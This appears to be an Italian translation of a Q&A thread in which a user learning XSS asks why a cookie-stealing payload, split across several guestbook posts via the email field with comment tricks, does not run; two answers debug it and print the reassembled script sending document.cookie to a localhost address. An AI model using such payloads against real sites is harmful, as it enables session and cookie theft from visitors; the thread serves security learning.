Learning XSS: Perché il mio javascript è ignorato?

3
<a href='mailto:</a><script>/*'></a><script>/*</a>:
 <br>   
<hr>
<a href='mailto:*/location.href=/*'>*/location.href=/*</a>: 
<br>
<hr>
<a href='mailto:*/"http://127.0.0.1/"/*'>*/"http://127.0.0.1/"/*</a>:
 <br>
<hr>
<a href='mailto:*/+document.cookie;/*'>*/+document.cookie;/*</a>:   
 <br>
<hr>
<a href='mailto:*/</script><a>'>*/</script><a></a>

Sto facendo l'iniezione in una configurazione del guestbook in cui viene iniettato l'XSS cambiando l'indirizzo email. La lunghezza massima dell'email è abbastanza breve da dover essere distribuita su più post. Durante il test, sono in grado di eseguire alert (1); ma quando devo diffondere un'espressione più complicata su più righe, le cose si spezzano. Cosa mi manca?

    
posta Chris 30.06.2014 - 02:06
fonte

2 risposte

3

Con i commenti rimossi, il tuo codice è simile a questo:

<a href='mailto:</a><script>location.href=location.href="http://127.0.0.1/""http://127.0.0.1/"+document.cookie;+document.cookie;</script><a>'>*/</script><a></a>

Ciò provoca un errore di sintassi, che impedisce l'esecuzione del codice. In particolare, il "" è problematico, innescando un SyntaxError per "Stringa non prevista."

    
risposta data 30.06.2014 - 05:57
fonte
1

Supponendo che questo sia il codice che viene visualizzato sulla pagina web, direi che l'URL che si passa a location.href non è corretto e ciò causa il blocco di Javascript. Quindi, non succede nulla. Il tuo codice se lo riformatti e rimuovi i commenti in questo modo (e sembra che ci sia un errore di battitura per il carattere > sulla prima riga ...)

<a href='mailto:</a><script>/*>'</a><script>location.href="http://127.0.0.1/"+document.cookie;</script><a></a>
    
risposta data 30.06.2014 - 05:22
fonte

Leggi altre domande sui tag